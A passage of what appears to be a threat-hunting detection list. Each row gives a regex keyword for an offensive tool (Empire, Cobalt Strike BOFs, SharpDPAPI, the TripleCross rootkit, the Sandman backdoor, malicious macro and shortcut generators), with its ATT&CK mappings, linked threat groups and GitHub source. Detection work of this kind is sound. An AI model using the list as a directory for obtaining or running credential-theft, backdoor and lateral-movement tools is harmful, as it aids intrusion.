Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51570" "*make_smb1_anonymous_login_packet*",".{0,1000}make_smb1_anonymous_login_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51571" "*make_smb1_echo_packet*",".{0,1000}make_smb1_echo_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51572" "*make_smb1_free_hole_session_packet*",".{0,1000}make_smb1_free_hole_session_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51573" "*make_smb1_nt_trans_packet*",".{0,1000}make_smb1_nt_trans_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51574" "*make_smb1_trans2_explo*",".{0,1000}make_smb1_trans2_explo.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51575" "*make_smb2_payload_body_packet*",".{0,1000}make_smb2_payload_body_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51576" "*make_smb2_payload_headers_packet*",".{0,1000}make_smb2_payload_headers_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51577" "*makebof.bat*",".{0,1000}makebof\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","51578" "*MakeHTTPSmugglerJAR.launch*",".{0,1000}MakeHTTPSmugglerJAR\.launch.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","network exploitation tool","N/A","8","721","107","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z","51579" "*makeivs-ng -b *",".{0,1000}makeivs\-ng\s\-b\s.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","51580" "*makemeadmin.com/*",".{0,1000}makemeadmin\.com\/.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51581" "*MakeMeAdminRemoteUI.exe*",".{0,1000}MakeMeAdminRemoteUI\.exe.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to 
administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51582" "*MakeMeAdminService.exe*",".{0,1000}MakeMeAdminService\.exe.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51583" "*MakeMeAdminService.fr*",".{0,1000}MakeMeAdminService\.fr.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51584" "*MakeMeAdminUI.resources.dll*",".{0,1000}MakeMeAdminUI\.resources\.dll.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","51585" "*MakeMeEnterpriseAdmin.ps1*",".{0,1000}MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","51586" "*MakeMeEnterpriseAdmin.ps1*",".{0,1000}MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos 
Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","51587" "*MakeMeEnterpriseAdmin.ps1*",".{0,1000}MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","51588" "*malcomvetter/CSExec*",".{0,1000}malcomvetter\/CSExec.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","51589" "*malcomvetter/UnstoppableService*",".{0,1000}malcomvetter\/UnstoppableService.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","1","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","51590" "*Maldev-Academy/HellHall*",".{0,1000}Maldev\-Academy\/HellHall.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","51595" 
"*maldevel/canisrufus*",".{0,1000}maldevel\/canisrufus.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","1","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","51596" "*Malicious program execve hijacker executed*",".{0,1000}Malicious\sprogram\sexecve\shijacker\sexecuted.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","51597" "*Malicious Shortcut Generator*",".{0,1000}Malicious\sShortcut\sGenerator.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","51598" "*Malicious Shortcut(.lnk) Generator*",".{0,1000}Malicious\sShortcut\(\.lnk\)\sGenerator.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","51599" "*malicious.csproj*",".{0,1000}malicious\.csproj.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning 
powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","N/A","10","1498","256","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z","51600" "*malicious.dll*",".{0,1000}malicious\.dll.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","51601" "*MALICIOUS_MAGIC = b""IDOV31""*",".{0,1000}MALICIOUS_MAGIC\s\=\sb\""IDOV31\"".{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","51602" "*MaliciousInjectedDll.dll*",".{0,1000}MaliciousInjectedDll\.dll.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","51603" "*MaliciousMacroGenerator*",".{0,1000}MaliciousMacroGenerator.{0,1000}","offensive_tool_keyword","MaliciousMacroGenerator","Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.","T1027 - T1564 - T1127 - T1059 - T1562","TA0002 - TA0008 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator","1","0","N/A","N/A","N/A","9","828","201","2019-04-17T19:47:38Z","2016-09-21T23:18:14Z","51604" "*MaliciousMacroMSBuild-master*",".{0,1000}MaliciousMacroMSBuild\-master.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","51605" "*Malleable C2 Files*",".{0,1000}Malleable\sC2\sFiles.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat 
Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","51606" "*Malleable PE/Stage*",".{0,1000}Malleable\sPE\/Stage.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk 